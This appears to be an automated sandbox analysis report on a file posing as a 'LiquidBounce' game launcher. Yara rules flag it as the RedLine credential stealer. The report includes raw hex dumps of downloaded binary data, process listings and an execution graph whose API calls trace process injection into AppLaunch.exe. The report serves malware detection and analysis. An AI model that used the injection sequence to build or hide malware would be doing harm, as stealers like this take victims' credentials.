                                                                                                                                                                                    2022-05-23 16:54:51 UTC1728INData Raw: 0e 0c 41 c3 0e 08 41 c6 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 40 00 00 00 1c 00 00 00 e4 ad e8 ff 63 00 00 00 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 20 7d 0e 18 43 0e 20 45 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 43 0b 45 0e 1c 43 0e 20 45 0e 0c 41 c3 0e 08 41 c6 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 28 ad e8 ff 15 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 14 00 00 00 1c 00 00 00 fc ab e8 ff 39 00 00 00 00 73 0e 10 45 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 14 00 00 00 1c 00 00 00 8c ab e8 ff 39 00 00 00 00 73 0e 10 45 0e 04 00 1c 00 00 00 00 00 00 00 01 7a 50 4c
                                                                                                                                                                                    Data Ascii: AAzR|@cAAE }C EAACEC EAAzR|(zR|9sEzR|9sEzPL
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1744INData Raw: 02 43 0a 0e 08 41 c3 0e 04 46 0b 20 00 00 00 c0 04 00 00 8c 95 ec ff 76 00 00 00 00 41 0e 08 83 02 45 0e 20 02 51 0a 0e 08 41 c3 0e 04 48 0b 20 00 00 00 e4 04 00 00 28 99 ec ff 76 00 00 00 00 41 0e 08 83 02 45 0e 20 02 51 0a 0e 08 41 c3 0e 04 48 0b 20 00 00 00 08 05 00 00 44 87 ec ff 5a 00 00 00 00 41 0e 08 83 02 45 0e 20 7c 0a 0e 08 41 c3 0e 04 41 0b 00 20 00 00 00 2c 05 00 00 a0 88 ec ff 5a 00 00 00 00 41 0e 08 83 02 45 0e 20 7c 0a 0e 08 41 c3 0e 04 41 0b 00 20 00 00 00 50 05 00 00 1c 93 ec ff 76 00 00 00 00 41 0e 08 83 02 45 0e 20 02 51 0a 0e 08 41 c3 0e 04 48 0b 24 00 00 00 38 03 00 00 88 82 ec ff 66 00 00 00 04 df 82 4b 00 41 0e 08 83 02 45 0e 20 02 43 0a 0e 08 41 c3 0e 04 46 0b 28 00 00 00 9c 05 00 00 a0 84 ec ff 50 00 00 00 00 41 0e 08 83 02 45 0e
                                                                                                                                                                                    Data Ascii: CAF vAE QAH (vAE QAH DZAE |AA ,ZAE |AA PvAE QAH$8fKAE CAF(PAE
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1760INData Raw: 00 00 00 1c 00 00 00 38 3b ee ff 72 00 00 00 00 41 0e 08 85 02 41 0e 0c 87 03 41 0e 10 86 04 41 0e 14 83 05 43 0e 40 02 46 0a 0e 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 45 0b 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 2c 00 00 00 1c 00 00 00 10 5c ee ff 30 00 00 00 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 20 5a 0e 18 45 0e 20 43 0e 0c 43 c3 0e 08 41 c6 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 2c 00 00 00 1c 00 00 00 f8 5b ee ff 36 00 00 00 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 20 60 0e 18 45 0e 20 43 0e 0c 43 c3 0e 08 41 c6 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 1c 00 00 00 1c 00 00 00 d0 60 ee ff 35 00 00 00 00 43 0e 20 69 0e 10 43
                                                                                                                                                                                    Data Ascii: 8;rAAAAC@FAAAAEzR|,\0AAE ZE CCAzR|,[6AAE `E CCAzR|`5C iC
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1776INData Raw: 41 0e 08 85 02 42 0d 05 42 87 03 86 04 44 83 05 02 f2 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 58 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 40 00 00 00 24 00 00 00 b8 8f ec ff 50 01 00 00 04 b2 8e 4b 00 41 0e 08 85 02 42 0d 05 43 87 03 86 04 83 05 02 ca 0a c3 41 c6 41 c7 41 c5 0c 04 04 4d 0b 58 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 00 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 40 00 00 00 24 00 00 00 a4 90 ec ff 50 01 00 00 04 d0 8e 4b 00 41 0e 08 85 02 42 0d 05 43 87 03 86 04 83 05 02 cc 0a c3 41 c6 41 c7 41 c5 0c 04 04 4b 0b 58 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 00 00 1c 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: ABBDAAACXAAACzPLR|PJ@$PKABCAAAMXAAACzPLR|PJ@$PKABCAAAKXAAAC
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1792INData Raw: 0e 0c 41 c7 0e 08 41 c5 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 20 00 00 00 1c 00 00 00 04 5a eb ff 4a 00 00 00 00 41 0e 08 83 02 57 0a c3 0e 04 48 0b 4d 0a c3 0e 04 45 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 3c 00 00 00 1c 00 00 00 68 71 eb ff 6a 00 00 00 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 30 5d 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 4a 0b 54 0e 28 43 0e 30 45 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 43 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 3c 00 00 00 1c 00 00 00 40 74 eb ff 6a 00 00 00 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 30 5d 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 4a 0b 54 0e 28 43 0e 30 45 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 43 0b 14 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: AAzR| ZJAWHMEzR|<hqjAAE0]AAJT(C0EAACzR|<@tjAAE0]AAJT(C0EAAC
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1808INData Raw: c3 41 c6 41 c5 0c 04 04 43 0b 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 30 00 00 00 24 00 00 00 4c bd ea ff db 00 00 00 04 46 93 4b 00 41 0e 08 85 02 42 0d 05 42 87 03 86 04 44 83 05 02 a5 0a c3 41 c6 41 c7 41 c5 0c 04 04 41 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 44 00 00 00 1c 00 00 00 e0 bd ea ff ac 00 00 00 00 41 0e 08 85 02 41 0e 0c 87 03 41 0e 10 86 04 41 0e 14 83 05 45 0e 40 76 0e 3c 46 0e 40 4a 0e 3c 4d 0e 40 02 49 0e 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 30 00 00 00 24 00 00 00 b8 ba ea ff fa 00 00 00 04 5a 93 4b 00 41 0e 08 85 02 45 0d 05 43 87 03
                                                                                                                                                                                    Data Ascii: AACzPLR|PJ0$LFKABBDAAAAzR|DAAAAE@v<F@J<M@IAAAAzPLR|PJ0$ZKAEC
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1824INData Raw: 73 76 63 72 74 2e 64 6c 6c 00 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00 28 a0 1c 00
                                                                                                                                                                                    Data Ascii: svcrt.dll(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((


                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:18:54:01
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Users\user\Desktop\LiquidBounceLauncher.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\LiquidBounceLauncher.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1156040 bytes
                                                                                                                                                                                    MD5 hash:8AAEB1206B0BA5BC0D7697148509A3BE
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.263225019.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                    Start time:18:54:02
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff647620000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                    Start time:18:54:09
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    Imagebase:0x1000000
                                                                                                                                                                                    File size:98912 bytes
                                                                                                                                                                                    MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:18:54:11
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 652
                                                                                                                                                                                    Imagebase:0x130000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                    Start time:18:54:52
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Tempsvchost.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Tempsvchost.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1878984 bytes
                                                                                                                                                                                    MD5 hash:6B59710C6032C24A28D5E09424978125
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 35%, Virustotal, Browse
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                    Start time:18:54:52
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff647620000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                    Start time:18:55:16
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    Imagebase:0x1000000
                                                                                                                                                                                    File size:98912 bytes
                                                                                                                                                                                    MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                    Start time:18:55:18
                                                                                                                                                                                    Start date:23/05/2022
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 660
                                                                                                                                                                                    Imagebase:0x130000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:12.1%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:5.5%
                                                                                                                                                                                      Signature Coverage:20.8%
                                                                                                                                                                                      Total number of Nodes:365
                                                                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                                                                      execution_graph 25287 401340 GetModuleHandleA 25288 4013a2 25287->25288 25289 40135f LoadLibraryA GetProcAddress GetProcAddress 25287->25289 25290 4013c0 GetModuleHandleA 25288->25290 25291 4013fa atexit 25288->25291 25289->25288 25292 4013d8 GetProcAddress 25290->25292 25293 4013ed 25290->25293 25292->25293 25293->25291 25294 4012e0 __set_app_type 25299 4011b0 25294->25299 25300 4011c0 25299->25300 25301 4011dc SetUnhandledExceptionFilter 25299->25301 25300->25301 25302 4011f0 25301->25302 25314 424940 25302->25314 25306 401202 25307 40120b _setmode _setmode _setmode 25306->25307 25308 40124d __p__fmode 25306->25308 25307->25308 25329 420340 25308->25329 25310 40125f 25311 401267 __p__environ 25310->25311 25344 4b09bc 25311->25344 25313 401288 _cexit ExitProcess 25315 4011fd 25314->25315 25316 424954 25314->25316 25318 41f990 25315->25318 25316->25315 25317 42499d _fpreset 25316->25317 25317->25315 25319 41fc86 25318->25319 25320 41f9a6 GetCommandLineA strlen 25318->25320 25385 4012a0 __getmainargs 25319->25385 25325 41f9c7 25320->25325 25322 41fc95 25322->25306 25323 41fa7c 25324 428ca0 68 API calls 25323->25324 25326 41faaf 25323->25326 25324->25319 25325->25323 25325->25326 25327 41fb70 _isctype 25325->25327 25375 428ca0 25325->25375 25326->25306 25327->25325 25330 420349 25329->25330 25331 420350 25329->25331 25330->25310 25331->25330 25332 420415 25331->25332 25335 4204fb 25331->25335 25339 4203b8 25331->25339 25333 420422 25332->25333 25334 420450 25332->25334 25333->25334 25472 420250 13 API calls 25333->25472 25334->25310 25473 420200 13 API calls 25335->25473 25338 42050b 25339->25334 25341 4203fd 25339->25341 25343 42048c 25339->25343 25340 420250 13 API calls 25340->25343 25471 420200 13 API calls 25341->25471 25343->25339 25343->25340 25345 4b09d8 25344->25345 25474 4104fc 25345->25474 25348 4b09e9 VirtualAlloc 25350 4b0a17 VirtualAlloc 25348->25350 25349 4b0a12 25349->25350 25351 4b0a3d 25349->25351 25352 4b0a66 25350->25352 25351->25352 25353 4b0a42 MessageBoxW 25351->25353 25481 4159f8 25352->25481 25353->25352 25355 4b0a71 25356 4b0a79 GetPEB 25355->25356 25357 4b0a85 FreeConsole GetPEB 25356->25357 25360 4b0b59 Sleep 25357->25360 25532 416389 25360->25532 25364 4b0cdf 25540 415ec4 25364->25540 25366 4b0e54 25552 4163e9 MultiByteToWideChar 25366->25552 25368 4b0e6b 25555 4163cc 25368->25555 25370 4b0e73 25558 415e81 25370->25558 25373 4b0ec7 25373->25313 25376 428cb6 25375->25376 25386 428410 25376->25386 25378 428ce2 25379 428ce9 25378->25379 25380 428d05 strlen 25378->25380 25379->25325 25381 428d21 25380->25381 25382 428d58 _strdup 25381->25382 25382->25379 25383 428d71 25382->25383 25437 428360 realloc 25383->25437 25385->25322 25387 428780 strlen 25386->25387 25388 42842a strlen 25386->25388 25407 428799 25387->25407 25438 420510 25388->25438 25392 428464 25393 428766 25392->25393 25394 428497 25392->25394 25395 42896e strlen 25392->25395 25393->25378 25396 428410 44 API calls 25394->25396 25398 428989 25395->25398 25402 4284ac 25396->25402 25397 4289bd _strdup 25397->25393 25401 4289cf 25397->25401 25398->25397 25399 4284db strlen 25399->25407 25431 4284f0 25399->25431 25400 42883c 25400->25378 25467 428360 realloc 25401->25467 25402->25393 25402->25399 25405 4289e6 25402->25405 25403 428410 44 API calls 25403->25407 25410 428bdf strlen 25405->25410 25405->25431 25406 428504 25406->25378 25407->25400 25407->25403 25408 428aaa free 25408->25393 25418 428bf7 25410->25418 25411 428b95 malloc 25414 428599 25411->25414 25411->25431 25412 428a6d free 25419 428a86 25412->25419 25420 428a9d 25412->25420 25413 4285b6 strlen 25413->25431 25414->25411 25414->25412 25414->25413 25416 428b61 _errno 25414->25416 25417 428a1d free 25414->25417 25414->25419 25414->25431 25465 429370 15 API calls 25414->25465 25416->25414 25417->25414 25422 428b4b 25417->25422 25421 428c1e _strdup 25418->25421 25423 428a8c free 25419->25423 25420->25408 25421->25422 25424 428c30 25421->25424 25422->25408 25423->25420 25423->25423 25424->25422 25470 428360 realloc 25424->25470 25429 428ac0 memcpy 25429->25431 25430 428644 memcpy strlen 25430->25431 25431->25406 25431->25408 25431->25411 25431->25414 25431->25417 25431->25429 25431->25430 25433 4286a9 _strdup 25431->25433 25434 4286f3 strcoll 25431->25434 25435 428715 _stricoll 25431->25435 25436 428729 malloc 25431->25436 25459 429530 FindNextFileA GetLastError _errno _errno 25431->25459 25460 429580 25431->25460 25466 428140 tolower tolower 25431->25466 25468 4283c0 realloc free 25431->25468 25469 428360 realloc 25431->25469 25433->25431 25434->25431 25435->25431 25436->25414 25436->25431 25437->25379 25439 42051d memcpy 25438->25439 25440 428df0 setlocale 25439->25440 25441 428e13 _strdup 25440->25441 25442 428e1d setlocale 25440->25442 25441->25442 25443 428e40 wcstombs realloc wcstombs setlocale free 25442->25443 25444 428e38 25442->25444 25443->25392 25444->25443 25445 428eb1 mbstowcs 25444->25445 25446 420510 25445->25446 25447 428ee0 mbstowcs 25446->25447 25448 428f25 25447->25448 25449 428f11 25447->25449 25450 42901e 25448->25450 25453 428f3d 25448->25453 25449->25448 25451 429150 setlocale free 25449->25451 25450->25443 25458 429030 25450->25458 25452 4290f8 25451->25452 25452->25392 25454 428fbb wcstombs realloc wcstombs 25453->25454 25453->25458 25455 4290e0 setlocale free 25454->25455 25455->25452 25456 4290b9 wcstombs 25456->25455 25457 4290dc 25456->25457 25457->25455 25458->25456 25458->25458 25459->25431 25461 4295b0 _errno 25460->25461 25462 42958c FindClose 25460->25462 25463 4295ab 25461->25463 25462->25461 25464 4295a1 free 25462->25464 25463->25431 25464->25463 25465->25414 25466->25431 25467->25407 25468->25417 25469->25431 25470->25422 25471->25332 25472->25333 25473->25338 25581 40b530 25474->25581 25477 41051f VirtualAlloc 25479 410546 25477->25479 25478 412596 VirtualAlloc 25480 4125bd 25478->25480 25479->25478 25479->25480 25480->25348 25480->25349 25482 40146e VirtualAlloc 25481->25482 25483 415a2b 25482->25483 25484 40146e VirtualAlloc 25483->25484 25485 415a40 25484->25485 25609 4156c4 25485->25609 25487 415a6d 25488 40146e VirtualAlloc 25487->25488 25489 415a90 25488->25489 25490 40146e VirtualAlloc 25489->25490 25491 415aae 25490->25491 25492 40146e VirtualAlloc 25491->25492 25493 415abe 25492->25493 25494 40146e VirtualAlloc 25493->25494 25495 415ae6 25494->25495 25618 4157a4 25495->25618 25497 415b25 25498 40146e VirtualAlloc 25497->25498 25499 415b43 25498->25499 25500 40146e VirtualAlloc 25499->25500 25501 415b56 25500->25501 25502 40146e VirtualAlloc 25501->25502 25503 415b69 25502->25503 25504 40146e VirtualAlloc 25503->25504 25505 415b9d 25504->25505 25629 41589e 25505->25629 25507 415c0d 25508 40146e VirtualAlloc 25507->25508 25509 415c2a 25508->25509 25510 40146e VirtualAlloc 25509->25510 25511 415c47 25510->25511 25644 4155a0 25511->25644 25513 415c52 25514 40146e VirtualAlloc 25513->25514 25515 415c6e 25514->25515 25516 40146e VirtualAlloc 25515->25516 25517 415c8c 25516->25517 25518 40146e VirtualAlloc 25517->25518 25519 415c9f 25518->25519 25520 40146e VirtualAlloc 25519->25520 25521 415cb2 25520->25521 25522 40146e VirtualAlloc 25521->25522 25523 415ce8 25522->25523 25659 4153f6 25523->25659 25525 415d05 25526 40146e VirtualAlloc 25525->25526 25527 415d21 25526->25527 25528 40146e VirtualAlloc 25527->25528 25529 415d3c 25528->25529 25530 40146e VirtualAlloc 25529->25530 25531 415d4c 25530->25531 25531->25355 25535 416396 25532->25535 25533 4163c5 25536 40146e 25533->25536 25534 4159f8 VirtualAlloc 25534->25535 25535->25533 25535->25534 25537 4014e3 25536->25537 25539 401483 25536->25539 25538 4014ef VirtualAlloc 25537->25538 25538->25364 25539->25364 25544 415f19 25540->25544 25541 415f47 GetPEB 25541->25544 25542 416046 25542->25542 25543 40146e VirtualAlloc 25542->25543 25551 41604c 25542->25551 25545 416147 25543->25545 25544->25541 25544->25542 25546 416183 GetPEB 25545->25546 25547 416190 GetPEB 25546->25547 25549 41625c VirtualProtect 25547->25549 25549->25551 25551->25366 25680 4a00b0 25552->25680 25554 41645f MultiByteToWideChar 25554->25368 25556 4159f8 VirtualAlloc 25555->25556 25557 4163da 25556->25557 25557->25370 25561 415e8e 25558->25561 25559 415ebd 25562 4d2381 25559->25562 25560 4159f8 VirtualAlloc 25560->25561 25561->25559 25561->25560 25563 4d2397 25562->25563 25564 4d2915 25562->25564 25563->25564 25682 4d234c GetPEB 25563->25682 25564->25373 25566 4d2428 25567 4d234c GetPEB 25566->25567 25579 4d2433 25567->25579 25568 4d264a CreateProcessW 25569 4d266d GetThreadContext 25568->25569 25568->25579 25570 4d2682 ReadProcessMemory 25569->25570 25569->25579 25570->25579 25571 4d26bd VirtualAlloc 25572 4d26da VirtualAllocEx 25571->25572 25571->25579 25572->25579 25573 4d2810 WriteProcessMemory 25574 4d2828 VirtualProtectEx 25573->25574 25573->25579 25574->25579 25575 4d28bf VirtualFree 25576 4d28cd WriteProcessMemory 25575->25576 25575->25579 25577 4d28e8 SetThreadContext 25576->25577 25576->25579 25578 4d2908 ResumeThread 25577->25578 25577->25579 25578->25564 25578->25579 25579->25564 25579->25568 25579->25571 25579->25573 25579->25575 25580 4d288f VirtualProtectEx 25579->25580 25580->25579 25590 406220 25581->25590 25584 40b553 VirtualAlloc 25587 40b57a 25584->25587 25585 40d57d VirtualAlloc 25586 40d5a4 25585->25586 25588 40e4d1 VirtualAlloc 25586->25588 25589 40e4f8 25586->25589 25587->25585 25587->25586 25588->25589 25589->25477 25589->25479 25599 401523 25590->25599 25593 406243 VirtualAlloc 25594 40626a 25593->25594 25595 4073f5 VirtualAlloc 25594->25595 25596 40741c 25594->25596 25595->25596 25597 4082d6 VirtualAlloc 25596->25597 25598 4082fd 25596->25598 25597->25598 25598->25584 25598->25587 25608 4014ef VirtualAlloc 25599->25608 25601 401534 25602 401548 VirtualAlloc 25601->25602 25604 40156f 25601->25604 25602->25604 25603 4032d8 VirtualAlloc 25605 4032ff 25603->25605 25604->25603 25604->25605 25606 4042e6 VirtualAlloc 25605->25606 25607 40430d 25605->25607 25606->25607 25607->25593 25607->25594 25608->25601 25610 40146e VirtualAlloc 25609->25610 25611 4156da 25610->25611 25612 40146e VirtualAlloc 25611->25612 25613 4156ea 25612->25613 25614 40146e VirtualAlloc 25613->25614 25615 4156fa 25614->25615 25616 40146e VirtualAlloc 25615->25616 25617 41570a 25616->25617 25617->25487 25619 40146e VirtualAlloc 25618->25619 25620 4157bc 25619->25620 25621 40146e VirtualAlloc 25620->25621 25622 4157cc 25621->25622 25623 40146e VirtualAlloc 25622->25623 25624 4157dc 25623->25624 25625 40146e VirtualAlloc 25624->25625 25626 4157ec 25625->25626 25627 40146e VirtualAlloc 25626->25627 25628 4157fc 25627->25628 25628->25497 25630 40146e VirtualAlloc 25629->25630 25631 4158bc 25630->25631 25632 40146e VirtualAlloc 25631->25632 25633 4158cc 25632->25633 25634 40146e VirtualAlloc 25633->25634 25635 4158dc 25634->25635 25636 40146e VirtualAlloc 25635->25636 25637 4158ec 25636->25637 25638 40146e VirtualAlloc 25637->25638 25639 4158fc 25638->25639 25640 40146e VirtualAlloc 25639->25640 25641 41590c 25640->25641 25642 40146e VirtualAlloc 25641->25642 25643 41592b 25642->25643 25643->25507 25645 40146e VirtualAlloc 25644->25645 25646 4155bb 25645->25646 25647 40146e VirtualAlloc 25646->25647 25648 4155cb 25647->25648 25649 40146e VirtualAlloc 25648->25649 25650 4155de 25649->25650 25651 40146e VirtualAlloc 25650->25651 25652 415601 25651->25652 25653 40146e VirtualAlloc 25652->25653 25654 415611 25653->25654 25655 40146e VirtualAlloc 25654->25655 25656 415631 25655->25656 25657 40146e VirtualAlloc 25656->25657 25658 415641 25657->25658 25658->25513 25660 40146e VirtualAlloc 25659->25660 25661 415411 25660->25661 25662 40146e VirtualAlloc 25661->25662 25663 415424 25662->25663 25664 40146e VirtualAlloc 25663->25664 25665 415437 25664->25665 25666 40146e VirtualAlloc 